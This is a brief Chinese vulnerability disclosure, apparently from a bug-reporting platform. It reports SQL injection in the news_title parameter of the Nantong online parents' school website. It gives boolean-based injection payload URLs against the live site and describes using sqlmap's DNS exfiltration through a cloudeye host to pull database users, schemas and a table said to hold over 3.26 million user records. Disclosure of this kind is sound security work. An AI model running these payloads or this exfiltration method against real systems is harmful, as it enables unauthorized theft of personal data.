南通网上家长学校SQL注入(cloudeye结合sqlmap返显/涉及326W+用户信息)
2016年07月15日
原文
目标:http://www.ntjxt.com
检测发现以下地方存在SQL注入:(注入参数news_title,布尔注入/cloudeye返显)
http://www.ntjxt.com/areas/result?news_title=十一五&area=10&type=1
Payload:
http://www.ntjxt.com/areas/result?news_title=十一五%' and 1=1 and '%'='&area=10&type=1
http://www.ntjxt.com/areas/result?news_title=十一五%' and 1=2 and '%'='&area=10&type=1
发现是Oracle数据库,于是直接在cloudeye主机上调用sqlmap的--dns-domain参数,可快速返显~
1、当前数据库用户
2、所有数据库
3、用户表,涉及326W+用户信息
解决方案:
请多指教~